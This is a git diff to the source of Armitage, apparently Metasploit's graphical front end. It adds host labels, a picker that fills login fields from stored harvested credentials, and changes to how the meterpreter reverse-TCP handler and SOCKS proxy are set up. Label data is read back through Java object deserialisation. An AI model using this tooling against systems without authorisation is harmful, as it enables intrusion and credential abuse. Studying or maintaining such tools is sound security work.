Jan 13</p> <br /> <p>Developed by:</p> diff --git a/external/source/armitage/resources/msfconsole.style b/external/source/armitage/resources/msfconsole.style index a8aa51662121..3d927f37a9c3 100644 --- a/external/source/armitage/resources/msfconsole.style +++ b/external/source/armitage/resources/msfconsole.style @@ -4,6 +4,7 @@ ^msf (.*?)\((.*?)\) > \umsf\u $1(\c4$2\o) > ^\[\*\] (.*) \cC[*]\o $1 ^\[\+\] (.*) \c9[+]\o $1 +^\[\!\] (.*) \c8[!]\o $1 ^\[\-\] (.*) \c4[-]\o $1 ^ =\[ (.*) =[\c7 $1 ^(=[=\s]+) \cE$1 diff --git a/external/source/armitage/resources/msfrpcd_new.bat b/external/source/armitage/resources/msfrpcd_new.bat new file mode 100644 index 000000000000..b1bcb31a212e --- /dev/null +++ b/external/source/armitage/resources/msfrpcd_new.bat @@ -0,0 +1,12 @@ +@echo off +set BASE=$$BASE$$..\..\ +cd "%BASE%" +set PATH=%BASE%ruby\bin;%BASE%java\bin;%BASE%tools;%BASE%nmap;%BASE%postgresql\bin;%PATH% +IF NOT EXIST "%BASE%java" GOTO NO_JAVA +set JAVA_HOME="%BASE%java" +:NO_JAVA +set MSF_DATABASE_CONFIG="%BASE%apps\pro\ui\config\database.yml" +set MSF_BUNDLE_GEMS=0 +set BUNDLE_GEMFILE=%BASE%apps\pro\ui\Gemfile +cd "%BASE%apps\pro\msf3" +rubyw msfrpcd -a 127.0.0.1 -U $$USER$$ -P $$PASS$$ -S -f -p $$PORT$$ diff --git a/external/source/armitage/scripts-cortana/cortanadb.sl b/external/source/armitage/scripts-cortana/cortanadb.sl index 97eae7e56bad..8b1842f5fc54 100644 --- a/external/source/armitage/scripts-cortana/cortanadb.sl +++ b/external/source/armitage/scripts-cortana/cortanadb.sl @@ -42,8 +42,13 @@ sub c_client { sub setupHandlers { find_job("Exploit: multi/handler", { if ($1 == -1) { + # set LPORT for the user... + local('$c'); + $c = call($client, "console.allocate")['id']; + call($client, "console.write", $c, "setg LPORT " . randomPort() . "\n"); + call($client, "console.release", $c); + # setup a handler for meterpreter - call($client, "core.setg", "LPORT", randomPort()); call($client, "module.execute", "exploit", "multi/handler", %( PAYLOAD => "windows/meterpreter/reverse_tcp", LHOST => "0.0.0.0", @@ -55,7 +60,7 @@ sub setupHandlers { sub main { global('$client $mclient'); - local('%r $exception'); + local('%r $exception $lhost $temp $c'); setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L); @@ -81,8 +86,24 @@ sub main { # setup second thread. %r = call($client, "armitage.validate", $user, $pass, $null, "armitage", 120326); + # resolve lhost.. + $c = call($client, "console.allocate")['id']; + call($client, "console.write", $c, "setg LHOST\n"); + while ($lhost eq "") { + $temp = call($client, "console.read", $c)['data']; + if (["$temp" startsWith: "LHOST => "]) { + $lhost = substr(["$temp" trim], 9); + } + else { + # this shouldn't happen because having LHOST set is a precondition + # for Cortana to connect to a team server. + sleep(1000); + } + } + call($client, "console.release", $c); + # pass some objects back yo. - [$loader passObjects: $client, $mclient]; + [$loader passObjects: $client, $mclient, $lhost]; # don't make previous messages available... call($mclient, "armitage.skip"); diff --git a/external/source/armitage/scripts-cortana/internal.sl b/external/source/armitage/scripts-cortana/internal.sl index d434f920da5a..c83929a79c1c 100644 --- a/external/source/armitage/scripts-cortana/internal.sl +++ b/external/source/armitage/scripts-cortana/internal.sl @@ -9,7 +9,7 @@ import msf.*; # setg("varname", "value") sub setg { - call_async("core.setg", $1, $2); + cmd_safe("setg $1 $2"); } sub readg { @@ -335,14 +335,22 @@ sub multi_handler { } sub handler { - local('%o $3'); - if ($3) { - %o = copy($3); - } + local('%o $3 $key $value'); - %o['PAYLOAD'] = "payload/ $+ $1"; + # default options + %o['PAYLOAD'] = $1; %o['LPORT'] = $2; + %o['DisablePayloadHandler'] = 'false'; + %o['ExitOnSession'] = 'false'; + + # let the user override anything + if ($3) { + foreach $key => $value ($3) { + %o[$key] = $value; + } + } + # make sure LHOST is correct if ('LHOST' !in %o) { if ("*http*" iswm $1) { %o['LHOST'] = lhost(); @@ -352,6 +360,7 @@ sub handler { } } + # let's do it... return launch('exploit', 'multi/handler', %o); } diff --git a/external/source/armitage/scripts/armitage.sl b/external/source/armitage/scripts/armitage.sl index 2cf69a9a9754..fe2af9a9ecbc 100644 --- a/external/source/armitage/scripts/armitage.sl +++ b/external/source/armitage/scripts/armitage.sl @@ -59,7 +59,7 @@ sub showHost { else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) { push(@overlay, 'resources/windowsxp.png'); } - else if ("*8*" iswm $match) { + else if ("*8*" iswm $match && "*2008*" !iswm $match) { push(@overlay, 'resources/windows8.png'); } else { @@ -139,7 +139,7 @@ sub _connectToMetasploit { $progress = [new ProgressMonitor: $null, "Connecting to $1 $+ : $+ $2", "first try... wish me luck.", 0, 100]; # keep track of whether we're connected to a local or remote Metasploit instance. This will affect what we expose. - $REMOTE = iff($1 eq "127.0.0.1", $null, 1); + $REMOTE = iff($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost", $null, 1); $flag = 10; while ($flag) { @@ -160,7 +160,7 @@ sub _connectToMetasploit { } # connecting locally? go to Metasploit directly... - if ($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost") { + if ($REMOTE is $null) { $client = [new MsgRpcImpl: $3, $4, $1, long($2), $null, $debug]; $aclient = [new RpcAsync: $client]; $mclient = $client; @@ -239,10 +239,6 @@ sub _connectToMetasploit { [$progress setNote: "Connected: ..."]; [$progress setProgress: 60]; - if (!$REMOTE && %MSF_GLOBAL['ARMITAGE_TEAM'] eq '1') { - showErrorAndQuit("Do not connect to 127.0.0.1 when\nrunning a team server."); - } - dispatchEvent(&postSetup); }, \$progress)); } diff --git a/external/source/armitage/scripts/attacks.sl b/external/source/armitage/scripts/attacks.sl index 4940fb4474e5..9fa13c9902d3 100644 --- a/external/source/armitage/scripts/attacks.sl +++ b/external/source/armitage/scripts/attacks.sl @@ -679,12 +679,20 @@ sub addFileListener { $actions["SigningCert"] = $actions["*FILE*"]; $actions["SigningKey"] = $actions["*FILE*"]; $actions["Wordlist"] = $actions["*FILE*"]; + $actions["EXE::Custom"] = $actions["*FILE*"]; + $actions["EXE::Template"] = $actions["*FILE*"]; $actions["WORDLIST"] = $actions["*FILE*"]; $actions["REXE"] = $actions["*FILE*"]; # set up an action to choose a session $actions["SESSION"] = lambda(&chooseSession); + # helpers to set credential pairs from database... yay? + $actions["USERNAME"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD"); + $actions["PASSWORD"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD"); + $actions["SMBUser"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass"); + $actions["SMBPass"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass"); + # set up an action to pop up a file chooser for different file type values. $actions["RHOST"] = { local('$title $temp'); diff --git a/external/source/armitage/scripts/gui.sl b/external/source/armitage/scripts/gui.sl index da5f974c100b..7f7f155f8828 100644 --- a/external/source/armitage/scripts/gui.sl +++ b/external/source/armitage/scripts/gui.sl @@ -446,7 +446,7 @@ sub quickListDialog { $button = [new JButton: $2]; [$button addActionListener: lambda({ - [$callback : [$model getSelectedValueFromColumn: $table, $lead]]; + [$callback : [$model getSelectedValueFromColumn: $table, $lead], $table, $model]; [$dialog setVisible: 0]; }, \$dialog, $callback => $5, \$model, \$table, $lead => $3[0])]; diff --git a/external/source/armitage/scripts/jobs.sl b/external/source/armitage/scripts/jobs.sl index fc30868be77e..603f8ccf1b23 100644 --- a/external/source/armitage/scripts/jobs.sl +++ b/external/source/armitage/scripts/jobs.sl @@ -16,47 +16,7 @@ import java.awt.event.*; import ui.*; sub manage_proxy_server { - manage_job("Auxiliary: server/socks4a", - # start server function - { - launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", $null); - }, - # description of job (for job kill function) - { - local('$host $port'); - ($host, $port) = values($2["datastore"], @("SRVHOST", "SRVPORT")); - return "SOCKS proxy is running on $host $+ : $+ $port $+ .\nWould you like to stop it?"; - } - ); - -} - -sub report_url { - find_job($name, { - if ($1 == -1) { - showError("Server not found"); - } - else { - local('$job $host $port $uripath'); - $job = call($client, "job.info", $1); - - ($host, $port) = values($job["info"]["datastore"], @("SRVHOST", "SRVPORT")); - $uripath = $job["info"]["uripath"]; - - local('$dialog $text $ok'); - $dialog = dialog("Output", 320, 240); - $text = [new JTextArea]; - [$text setText: "http:// $+ $host $+ : $+ $port $+ $uripath"]; - - $button = [new JButton: "Ok"]; - [$button addActionListener: lambda({ [$dialog setVisible: 0]; }, \$dialog)]; - - [$dialog add: [new JScrollPane: $text], [BorderLayout CENTER]]; - [$dialog add: center($button), [BorderLayout SOUTH]]; - - [$dialog setVisible: 1]; - } - }); + launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", 1); } sub find_job { @@ -80,26 +40,6 @@ sub find_job { }, $name => $1, $function => $2)); } -# manage_job(job name, { start job function }, { job dialog info }) -sub manage_job { - local('$name $startf $stopf'); - ($name, $startf, $stopf) = @_; - - find_job($name, lambda({ - if ($1 == -1) { - [$startf]; - } - else { - local('$job $confirm $foo $confirm'); - $job = call($client, "job.info", $1); - $confirm = askYesNo([$stopf : $1, $job], "Stop Job"); - if ($confirm eq "0") { - call_async($client, "job.stop", $1); - } - } - }, \$startf, \$stopf)); -} - sub generatePayload { local('$file'); $file = saveFile2(); @@ -450,6 +390,11 @@ sub _launch_dialog { elog("launched DNS enum for $domain"); } } + else if ($type eq "auxiliary" && $command eq "server/socks4a") { + local('$host $port'); + ($host, $port) = values($options, @('SRVHOST', 'SRVPORT')); + elog("started SOCKS proxy server at $host $+ : $+ $port"); + } launch_service($title, "$type $+ / $+ $command", $options, $type, $format => [$combo getSelectedItem]); } diff --git a/external/source/armitage/scripts/menus.sl b/external/source/armitage/scripts/menus.sl index 7c70ba2d6285..59cd3c514382 100644 --- a/external/source/armitage/scripts/menus.sl +++ b/external/source/armitage/scripts/menus.sl @@ -54,6 +54,29 @@ sub host_selected_items { item($i, '3. Vista/7', '3', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "Vista")); item($i, '4. 8/RT', '4', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "8")); + item($h, "Set Label...", 'S', lambda({ + # calculate preexisting label to prompt with + local('$label %l $host'); + + # get a label + foreach $host ($hosts) { + if ($label eq "") { + $label = getHostLabel($host); + } + } + + # ask for a label + $label = ask("Set label to:", $label); + if ($label !is $null) { + foreach $host ($hosts) { + %l[$host] = ["$label" trim]; + } + call_async($mclient, "db.report_labels", %l); + } + }, $hosts => $2)); + + separator($h); + item($h, "Remove Host", 'R', clearHostFunction($2)); } diff --git a/external/source/armitage/scripts/passhash.sl b/external/source/armitage/scripts/passhash.sl index 19feb846c31e..ad9f68ce6ac7 100644 --- a/external/source/armitage/scripts/passhash.sl +++ b/external/source/armitage/scripts/passhash.sl @@ -372,3 +372,34 @@ sub launchBruteForce { [$console start]; }, $type => $1, $module => $2, $options => $3, $title => $4)); } + +sub credentialHelper { + thread(lambda({ + [Thread yield]; + + # gather our credentials please + local('$creds $cred @creds'); + $creds = call($mclient, "db.creds2", [new HashMap])["creds2"]; + foreach $cred ($creds) { + if ($PASS eq "SMBPass" || $cred['ptype'] ne "smb_hash") { + push(@creds, $cred); + } + } + + # pop up a dialog to let the user choose their favorite set + quickListDialog("Choose credentials", "Select", @("user", "user", "pass", "host"), @creds, $width => 640, $height => 240, lambda({ + if ($1 eq "") { + return; + } + + local('$user $pass'); + $user = [$3 getSelectedValueFromColumn: $2, 'user']; + $pass = [$3 getSelectedValueFromColumn: $2, 'pass']; + + [$model setValueForKey: $USER, "Value", $user]; + [$model setValueForKey: $PASS, "Value", $pass]; + [$model fireListeners]; + }, \$callback, \$model, \$USER, \$PASS)); + }, \$USER, \$PASS, \$model, $callback => $4)); +} + diff --git a/external/source/armitage/scripts/server.sl b/external/source/armitage/scripts/server.sl index 78f9738dbba7..1ea04e9671e6 100644 --- a/external/source/armitage/scripts/server.sl +++ b/external/source/armitage/scripts/server.sl @@ -403,9 +403,6 @@ sub main { # we need this global to be set so our reverse listeners work as expected. $MY_ADDRESS = $host; - # make sure clients know a team server is present. can't happen async. - call($client, "core.setg", "ARMITAGE_TEAM", '1'); - # # setup the client cache # diff --git a/external/source/armitage/scripts/targets.sl b/external/source/armitage/scripts/targets.sl index 7929dac69635..3721006ea7d3 100644 --- a/external/source/armitage/scripts/targets.sl +++ b/external/source/armitage/scripts/targets.sl @@ -21,6 +21,10 @@ sub getHostOS { return iff($1 in %hosts, %hosts[$1]['os_name'], $null); } +sub getHostLabel { + return iff($1 in %hosts, %hosts[$1]['label'], $null); +} + sub getSessions { return iff($1 in %hosts && 'sessions' in %hosts[$1], %hosts[$1]['sessions']); } @@ -122,7 +126,7 @@ on sessions { } if ($host['show'] eq "1") { - push(@nodes, @($id, describeHost($host), showHost($host), $tooltip)); + push(@nodes, @($id, $host['label'] . "", describeHost($host), showHost($host), $tooltip)); } } @@ -130,14 +134,14 @@ on sessions { } sub refreshGraph { - local('$node $id $description $icons $tooltip $highlight'); + local('$node $id $label $description $icons $tooltip $highlight'); # update everything... [$graph start]; # do the hosts? foreach $node (@nodes) { - ($id, $description, $icons, $tooltip) = $node; - [$graph addNode: $id, $description, $icons, $tooltip]; + ($id, $label, $description, $icons, $tooltip) = $node; + [$graph addNode: $id, $label, $description, $icons, $tooltip]; } # update the routes diff --git a/external/source/armitage/scripts/util.sl b/external/source/armitage/scripts/util.sl index ceed745950e1..de80e1d8d343 100644 --- a/external/source/armitage/scripts/util.sl +++ b/external/source/armitage/scripts/util.sl @@ -159,12 +159,15 @@ sub setg { } sub createDefaultHandler { - warn("Creating a default reverse handler..."); # setup a handler for meterpreter - setg("LPORT", randomPort()); + local('$port'); + $port = randomPort(); + setg("LPORT", $port); + warn("Creating a default reverse handler... 0.0.0.0: $+ $port"); call_async($client, "module.execute", "exploit", "multi/handler", %( PAYLOAD => "windows/meterpreter/reverse_tcp", LHOST => "0.0.0.0", + LPORT => $port, ExitOnSession => "false" )); } @@ -307,7 +310,12 @@ sub startMetasploit { savePreferences(); } - $handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null]; + if ("*apps*pro*" iswm $msfdir) { + $handle = [SleepUtils getIOHandle: resource("resources/msfrpcd_new.bat"), $null]; + } + else { + $handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null]; + } $data = join("\r\n", readAll($handle, -1)); closef($handle); @@ -416,7 +424,7 @@ sub connectDialog { [$dialog setVisible: 0]; connectToMetasploit($h, $p, $u, $s); - if ($h eq "127.0.0.1" || $h eq "localhost") { + if ($h eq "127.0.0.1" || $h eq "::1" || $h eq "localhost") { try { closef(connect("127.0.0.1", $p, 1000)); } diff --git a/external/source/armitage/scripts/workspaces.sl b/external/source/armitage/scripts/workspaces.sl index 90c1210b50dd..5a45900654f9 100644 --- a/external/source/armitage/scripts/workspaces.sl +++ b/external/source/armitage/scripts/workspaces.sl @@ -33,7 +33,7 @@ sub listWorkspaces { $dialog = [new JPanel]; [$dialog setLayout: [new BorderLayout]]; - ($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "session"), @()); + ($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "labels", "session"), @()); updateWorkspaceList($table, $model); [$table setSelectionMode: [ListSelectionModel MULTIPLE_INTERVAL_SELECTION]]; @@ -88,15 +88,16 @@ sub workspaceDialog { local('$table $model'); ($table, $model) = $2; - local('$dialog $name $host $ports $os $button $session'); + local('$dialog $name $host $ports $os $button $session $label'); $dialog = dialog($title, 640, 480); - [$dialog setLayout: [new GridLayout: 6, 1]]; + [$dialog setLayout: [new GridLayout: 7, 1]]; $name = [new ATextField: $1['name'], 16]; [$name setEnabled: $enable]; $host = [new ATextField: $1['hosts'], 16]; $ports = [new ATextField: $1['ports'], 16]; $os = [new ATextField: $1['os'], 16]; + $label = [new ATextField: $1['labels'], 16]; $session = [new JCheckBox: "Hosts with sessions only"]; if ($1['session'] eq 1) { [$session setSelected: 1]; @@ -108,6 +109,7 @@ sub workspaceDialog { [$dialog add: label_for("Hosts:", 60, $host)]; [$dialog add: label_for("Ports:", 60, $ports)]; [$dialog add: label_for("OS:", 60, $os)]; + [$dialog add: label_for("Labels:", 60, $label)]; [$dialog add: $session]; [$dialog add: center($button)]; @@ -116,15 +118,16 @@ sub workspaceDialog { [$button addActionListener: lambda({ # yay, we have a dialog... - local('$n $h $p $o $s @workspaces $ws $temp'); + local('$n $h $p $o $s $l @workspaces $ws $temp'); $n = [[$name getText] trim]; $h = [strrep([$host getText], '*', '%', '?', '_') trim]; $p = [[$ports getText] trim]; $o = [strrep([$os getText], '*', '%', '?', '_') trim]; + $l = [[$label getText] trim]; $s = [$session isSelected]; # save the new menu - $ws = workspace($n, $h, $p, $o, $s); + $ws = workspace($n, $h, $p, $o, $s, $l); @workspaces = workspaces(); foreach $temp (@workspaces) { if ($temp["name"] eq $n) { @@ -140,7 +143,7 @@ sub workspaceDialog { updateWorkspaceList($table, $model); [$dialog setVisible: 0]; - }, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model)]; + }, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model, \$label)]; } sub reset_workspace { @@ -199,16 +202,16 @@ sub set_workspace { } sub workspace { - return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5); + return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5, labels => $6); } sub workspaces { - local('$ws @r $name $host $port $os $session $workspace'); + local('$ws @r $name $host $port $os $session $workspace $label'); $ws = split("!!", [$preferences getProperty: "armitage.workspaces.menus", ""]); foreach $workspace ($ws) { if ($workspace ne "") { - ($name, $host, $port, $os, $session) = split('@@', $workspace); - push(@r, workspace($name, $host, $port, $os, $session)); + ($name, $host, $port, $os, $session, $label) = split('@@', $workspace); + push(@r, workspace($name, $host, $port, $os, $session, $label)); } } return @r; diff --git a/external/source/armitage/src/armitage/ArmitageApplication.java b/external/source/armitage/src/armitage/ArmitageApplication.java index aec7602dd01b..b7365e1309ab 100644 --- a/external/source/armitage/src/armitage/ArmitageApplication.java +++ b/external/source/armitage/src/armitage/ArmitageApplication.java @@ -196,6 +196,7 @@ public void popAppTab(Component tab) { r.setLayout(new BorderLayout()); r.add(t.component, BorderLayout.CENTER); r.pack(); + t.component.validate(); r.addWindowListener(new WindowAdapter() { public void windowClosing(WindowEvent ev) { diff --git a/external/source/armitage/src/cortana/Loader.java b/external/source/armitage/src/cortana/Loader.java index a0a8a8c3c065..d5c76d836df0 100644 --- a/external/source/armitage/src/cortana/Loader.java +++ b/external/source/armitage/src/cortana/Loader.java @@ -15,7 +15,7 @@ public class Loader implements Loadable { protected ScriptLoader loader; protected Hashtable shared = new Hashtable(); protected ScriptVariables vars = new ScriptVariables(); - protected Object[] passMe = new Object[2]; + protected Object[] passMe = new Object[3]; protected List scripts = new LinkedList(); public void unsetDebugLevel(int flag) { @@ -51,10 +51,11 @@ public boolean isReady() { } } - public void passObjects(Object o, Object p) { + public void passObjects(Object o, Object p, Object q) { synchronized (this) { passMe[0] = o; passMe[1] = p; + passMe[2] = q; } } diff --git a/external/source/armitage/src/cortana/Main.java b/external/source/armitage/src/cortana/Main.java index be70944f5d2e..be04c511a31e 100644 --- a/external/source/armitage/src/cortana/Main.java +++ b/external/source/armitage/src/cortana/Main.java @@ -69,7 +69,7 @@ public void start(String host, String port, String user, String pass, String nic try { Object conns[] = setupConnections(host, port, user, pass, nick); //new MsgRpcImpl(user, pass, host, Integer.parseInt(port), true, false); - engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, host); + engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, (String)conns[2]); new Thread(this).start(); } catch (java.lang.RuntimeException rex) { diff --git a/external/source/armitage/src/graph/NetworkGraph.java b/external/source/armitage/src/graph/NetworkGraph.java index fa9b0e7eef5a..d15d67b3acc5 100644 --- a/external/source/armitage/src/graph/NetworkGraph.java +++ b/external/source/armitage/src/graph/NetworkGraph.java @@ -453,17 +453,26 @@ public void setRoutes(Route[] routes) { protected Map tooltips = new HashMap(); - public Object addNode(String id, String label, Image image, String tooltip) { + public Object addNode(String id, String label, String description, Image image, String tooltip) { nodeImages.put(id, image); + if (label.length() > 0) { + if (description.length() > 0) { + description += "\n" + label; + } + else { + description = label; + } + } + mxCell cell; if (!nodes.containsKey(id)) { - cell = (mxCell)graph.insertVertex(parent, id, label, 0, 0, 125, 97); + cell = (mxCell)graph.insertVertex(parent, id, description, 0, 0, 125, 97); nodes.put(id, cell); } else { cell = (mxCell)nodes.get(id); - cell.setValue(label); + cell.setValue(description); } nodes.touch(id); diff --git a/external/source/armitage/src/msf/DatabaseImpl.java b/external/source/armitage/src/msf/DatabaseImpl.java index ba7b330d590c..ff00d4d877df 100644 --- a/external/source/armitage/src/msf/DatabaseImpl.java +++ b/external/source/armitage/src/msf/DatabaseImpl.java @@ -14,11 +14,15 @@ public class DatabaseImpl implements RpcConnection { protected String workspaceid = "0"; protected String hFilter = null; protected String sFilter = null; + protected String[] lFilter = null; protected Route[] rFilter = null; protected String[] oFilter = null; protected int hindex = 0; protected int sindex = 0; + /* keep track of labels associated with each host */ + protected Map labels = new HashMap(); + /* define the maximum hosts in a workspace */ protected int maxhosts = 512; @@ -135,6 +139,20 @@ private boolean checkRoute(String address) { return false; } + private boolean checkLabel(String host) { + if (!labels.containsKey(host)) + return false; + + String label_l = (labels.get(host) + "").toLowerCase(); + + for (int x = 0; x < lFilter.length; x++) { + if (label_l.indexOf(lFilter[x]) != -1) { + return true; + } + } + return false; + } + private boolean checkOS(String os) { String os_l = os.toLowerCase(); @@ -145,11 +163,76 @@ private boolean checkOS(String os) { return false; } + protected void loadLabels() { + try { + /* query database for label data */ + List rows = executeQuery("SELECT DISTINCT data FROM notes WHERE ntype = 'armitage.labels'"); + if (rows.size() == 0) + return; + + /* extract our BASE64 encoded data */ + String data = ((Map)rows.get(0)).get("data") + ""; + System.err.println("Read: " + data.length() + " bytes"); + + /* turn our data into raw data */ + byte[] raw = Base64.decode(data); + + /* deserialize our notes data */ + ByteArrayInputStream store = new ByteArrayInputStream(raw); + ObjectInputStream handle = new ObjectInputStream(store); + Map temp = (Map)(handle.readObject()); + handle.close(); + store.close(); + + /* merge with our new map */ + labels.putAll(temp); + } + catch (Exception ex) { + ex.printStackTrace(); + } + } + + protected void mergeLabels(Map l) { + /* accept any label values and merge them into our global data set */ + Iterator i = l.entrySet().iterator(); + while (i.hasNext()) { + Map.Entry entry = (Map.Entry)i.next(); + if ("".equals(entry.getValue())) { + labels.remove(entry.getKey() + ""); + } + else { + labels.put(entry.getKey() + "", entry.getValue() + ""); + } + } + } + + /* add labels to our hosts */ + public List addLabels(List rows) { + if (labels.size() == 0) + return rows; + + Iterator i = rows.iterator(); + while (i.hasNext()) { + Map entry = (Map)i.next(); + String address = (entry.containsKey("address") ? entry.get("address") : entry.get("host")) + ""; + if (labels.containsKey(address)) { + entry.put("label", labels.get(address) + ""); + } + else { + entry.put("label", ""); + } + } + + return rows; + } + public List filterByRoute(List rows, int max) { - if (rFilter != null || oFilter != null) { + if (rFilter != null || oFilter != null || lFilter != null) { Iterator i = rows.iterator(); while (i.hasNext()) { Map entry = (Map)i.next(); + + /* make sure the address is within a route we care about */ if (rFilter != null && entry.containsKey("address")) { if (!checkRoute(entry.get("address") + "")) { i.remove(); @@ -163,9 +246,26 @@ else if (rFilter != null && entry.containsKey("host")) { } } + /* make sure the host is something we care about too */ if (oFilter != null && entry.containsKey("os_name")) { - if (!checkOS(entry.get("os_name") + "")) + if (!checkOS(entry.get("os_name") + "")) { + i.remove(); + continue; + } + } + + /* make sure the host has the right label */ + if (lFilter != null && entry.containsKey("address")) { + if (!checkLabel(entry.get("address") + "")) { + i.remove(); + continue; + } + } + else if (lFilter != null && entry.containsKey("host")) { + if (!checkLabel(entry.get("host") + "")) { i.remove(); + continue; + } } } @@ -180,6 +280,7 @@ else if (rFilter != null && entry.containsKey("host")) { public void connect(String dbstring, String user, String password) throws Exception { db = DriverManager.getConnection(dbstring, user, password); setWorkspace("default"); + loadLabels(); } public Object execute(String methodName) throws IOException { @@ -192,8 +293,8 @@ protected Map build() { /* this is an optimization. If we have a network or OS filter, we need to pull back all host/service records and filter them here. If we do not have these types of filters, then we can let the database do the heavy lifting and limit the size of the final result there. */ - int limit1 = rFilter == null && oFilter == null ? maxhosts : 30000; - int limit2 = rFilter == null && oFilter == null ? maxservices : 100000; + int limit1 = rFilter == null && oFilter == null && lFilter == null ? maxhosts : 30000; + int limit2 = rFilter == null && oFilter == null && lFilter == null ? maxservices : 100000; temp.put("db.creds", "SELECT DISTINCT creds.*, hosts.address as host, services.name as sname, services.port as port, services.proto as proto FROM creds, services, hosts WHERE services.id = creds.service_id AND hosts.id = services.host_id AND hosts.workspace_id = " + workspaceid); @@ -235,7 +336,7 @@ public Object execute(String methodName, Object[] params) throws IOException { result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxservices)); } else if (methodName.equals("db.hosts")) { - result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxhosts)); + result.put(methodName.substring(3), addLabels(filterByRoute(executeQuery(query), maxhosts))); } else { result.put(methodName.substring(3), executeQuery(query)); @@ -332,6 +433,7 @@ else if (methodName.equals("db.filter")) { rFilter = null; oFilter = null; + lFilter = null; List hosts = new LinkedList(); List srvcs = new LinkedList(); @@ -385,6 +487,11 @@ else if (methodName.equals("db.filter")) { oFilter = (values.get("os") + "").toLowerCase().split(",\\s*"); } + /* label filter */ + if (values.containsKey("labels") && (values.get("labels") + "").length() > 0) { + lFilter = (values.get("labels") + "").toLowerCase().split(",\\s*"); + } + if (hosts.size() == 0) { hFilter = null; } @@ -406,6 +513,31 @@ else if (methodName.equals("db.fix_creds")) { result.put("rows", new Integer(stmt.executeUpdate())); return result; } + else if (methodName.equals("db.report_labels")) { + /* merge out global label data */ + Map values = (Map)params[0]; + mergeLabels(values); + + /* delete our saved label data */ + executeUpdate("DELETE FROM notes WHERE notes.ntype = 'armitage.labels'"); + + /* serialize our notes data */ + ByteArrayOutputStream store = new ByteArrayOutputStream(labels.size() * 128); + ObjectOutputStream handle = new ObjectOutputStream(store); + handle.writeObject(labels); + handle.close(); + store.close(); + + String data = Base64.encode(store.toByteArray()); + + /* save our label data */ + PreparedStatement stmt = null; + stmt = db.prepareStatement("INSERT INTO notes (ntype, data) VALUES ('armitage.labels', ?)"); + stmt.setString(1, data); + stmt.executeUpdate(); + + return new HashMap(); + } else if (methodName.equals("db.report_host")) { Map values = (Map)params[0]; String host = values.get("host") + ""; diff --git a/external/source/armitage/src/msf/RpcCacheImpl.java b/external/source/armitage/src/msf/RpcCacheImpl.java index c28e037e91b2..4a1d7e85cb3f 100644 --- a/external/source/armitage/src/msf/RpcCacheImpl.java +++ b/external/source/armitage/src/msf/RpcCacheImpl.java @@ -106,6 +106,8 @@ private static String cacheKey(String method, Object[] args) { key.append(temp.get("ports")); key.append(";"); key.append(temp.get("session")); + key.append(";"); + key.append(temp.get("labels")); return key.toString(); } diff --git a/external/source/armitage/src/table/NetworkTable.java b/external/source/armitage/src/table/NetworkTable.java index 014fed3a101e..2d7590db0e13 100644 --- a/external/source/armitage/src/table/NetworkTable.java +++ b/external/source/armitage/src/table/NetworkTable.java @@ -52,7 +52,7 @@ public NetworkTable() { public NetworkTable(Properties display) { this.display = display; - model = new GenericTableModel(new String[] { " ", "Address", "Description", "Pivot" }, "Address", 256); + model = new GenericTableModel(new String[] { " ", "Address", "Label", "Description", "Pivot" }, "Address", 256); table = new ATable(model); TableRowSorter sorter = new TableRowSorter(model); sorter.toggleSortOrder(1); @@ -79,12 +79,13 @@ public boolean equals(Object a, Object b) { }; sorter.setComparator(1, hostCompare); - sorter.setComparator(3, hostCompare); + sorter.setComparator(4, hostCompare); table.setRowSorter(sorter); table.setColumnSelectionAllowed(false); table.getColumn("Address").setPreferredWidth(125); + table.getColumn("Label").setPreferredWidth(125); table.getColumn("Pivot").setPreferredWidth(125); table.getColumn(" ").setPreferredWidth(32); table.getColumn(" ").setMaxWidth(32); @@ -95,7 +96,7 @@ public boolean equals(Object a, Object b) { public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) { JLabel component = (JLabel)parent.getTableCellRendererComponent(table, value, isSelected, false, row, col); - if (col == 3 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) { + if (col == 4 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) { component.setFont(component.getFont().deriveFont(Font.BOLD)); } else if (col == 1 && !"".equals(model.getValueAt(table, row, "Description"))) { @@ -252,16 +253,17 @@ public void setAutoLayout(String layout) { public void addActionForKeySetting(String key, String dvalue, Action action) { } - public Object addNode(String id, String label, Image image, String tooltip) { + public Object addNode(String id, String label, String description, Image image, String tooltip) { if (id == null || label == null) return null; HashMap map = new HashMap(); map.put("Address", id); - if (label.indexOf(id) > -1) - label = label.substring(id.length()); - map.put("Description", label); + if (description.indexOf(id) > -1) + description = description.substring(id.length()); + map.put("Label", label); + map.put("Description", description); map.put("Tooltip", tooltip); map.put("Image", image); map.put(" ", tooltip); diff --git a/external/source/armitage/src/ui/ATable.java b/external/source/armitage/src/ui/ATable.java index bc1569659cb7..ce80216dbd8d 100644 --- a/external/source/armitage/src/ui/ATable.java +++ b/external/source/armitage/src/ui/ATable.java @@ -26,6 +26,12 @@ public static TableCellRenderer getDefaultTableRenderer(final JTable table, fina 